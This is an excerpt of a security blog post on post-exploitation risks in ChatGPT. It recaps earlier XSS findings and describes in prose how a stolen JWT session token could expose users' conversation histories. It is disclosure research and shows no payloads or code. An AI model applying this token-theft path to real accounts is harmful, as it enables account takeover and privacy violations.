Site icon API Security Blog

From ChatBot To SpyBot: ChatGPT Post Exploitation

In the second installment of our blog post series on ChatGPT, we delve deeper into the security implications that come with the integration of AI into our daily routines. Building on the discoveries shared in our initial post, "XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT," where we uncovered two Cross-Site Scripting (XSS) vulnerabilities, we now explore the potential for post-exploitation risks. This examination is particularly focused on how attackers could exploit OpenAI's ChatGPT to gain persistent access to user data and manipulate application behavior. The Problem with XSS on ChatGPT In the previous blog, we demonstrated how a threat actor could use an XSS vulnerability to exfiltrate the response from /api/auth/session and retrieve the user's JWT access token. This token can be used across most ChatGPT API endpoints, except for /api/auth/session itself. Such a measure prevents permanent access to accounts with leaked access tokens, whether through XSS attacks or other vulnerabilities. However, once the threat actor has your JWT token, they could do almost anything on your account, exfiltrate all your historical conversations, or initiate new ones. It's important to highlight that the JWT access token provided by the /api/auth/session endpoint is valid for only about two and a half days. This limited validity period significantly reduces the potential for threat actors to maintain persistent access to compromised accounts, since the attacker would have to…Read More

Exit mobile version